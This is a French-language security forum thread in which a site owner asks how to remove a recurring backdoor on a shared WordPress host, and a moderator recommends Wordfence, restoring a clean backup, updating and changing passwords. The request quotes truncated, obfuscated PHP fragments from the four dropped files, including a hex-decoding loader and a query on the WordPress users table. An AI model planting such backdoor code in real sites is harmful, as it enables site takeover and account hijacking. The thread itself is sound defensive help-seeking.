Supprimer backdoor serveur Wordpress

Questions autour de la sécurité en général.
Pour les désinfections, merci de vous rendre dans la partie Windows --> Virus : Aide Malwares
dutel24
Messages : 1
Inscription : 15 juil. 2021 20:24

Supprimer backdoor serveur Wordpress

par dutel24 »

Bonjour,

j'ai un backdoor qui injecte des fichiers à la racine du serveur mutualisé ou il n'y a pas de wordpress installé directement,
je les supprime régulièrement et j'analyse les plugin wordpress de mes sites et j'ai installé un plugin monitor pour les changements
sur le serveur ftp des sites apparemment il faut que je le fasse pour chaque site.Et puis il faudrait que j'installe un site à la racine peut etre pour
voir comment ca commence?

Juste si vous avez quelques infos sur les scripts ou une idée d'enrayer cela
l'attaquant crée 4 fichiers à chaque fois, merci
admin.php
extrait du code : <?php
if (!function_exists('hex2bin')) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = ""; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =

fox-style.php
extrait du code : <?php
if (!function_exists('hex2bin')) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = ""; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =

index.php
extrait du code
<?php goto t5YxR; t5YxR: function vPFWr($KPBxi) { goto b6wCq; SJCmP: return $KPBxi; goto fSf_U; Q2Oje: $KPBxi = substr($KPBxi, (int) wiNPsmNlGPpvYAW8vkEagLZs0xEQF9Id0Zxcy3N8yyv4O3BNi8867z6KCOeU3gdBhGXpXm0PoGxaVif09Svu8wjnWvubjfr3sCZUpfhnA7f1tvCx0JAoDNo

reads.hlm
get_results( "SELECT ID FROM $wpdb->users ORDER BY ID ASC" ); $authorId = 0; $firstUserId = 0; if( $users ) { foreach ( $users as $user ) { if($firstUserId == 0){ $firstUserId = $user->ID; } $wp_user =
Malekal_morte
Messages : 107862
Inscription : 10 sept. 2005 13:57

Re: backdoor serveur wordpress

par Malekal_morte »

Salut,

L'extension WordPress Firewall permet de trouver les fichiers PHP Wordpress qui ont été modifiées : https://www.malekal.com/wordfence-suppr ... wordpress/
Cela permet de les restaurer pour retirer le code malveillant et les injections de code.

Mais le mieux est de repartir sur une sauvegarde saine, puis mettre à jour WordPress ainsi que tous les extensions.
Puis vérifier avec WordFence que tout est sain.
Enfin changer les mots de passe de tous les comptes.

Sinon réinstaller WordPress avec le ZIP du site en écrasant les fichiers PHP présents (sauf wp-config.php).
Remettre les extensions.
Changer les mots de passe de tous les comptes.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 107862
Inscription : 10 sept. 2005 13:57

Re: Supprimer backdoor serveur Wordpress

par Malekal_morte »

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Securite informatique »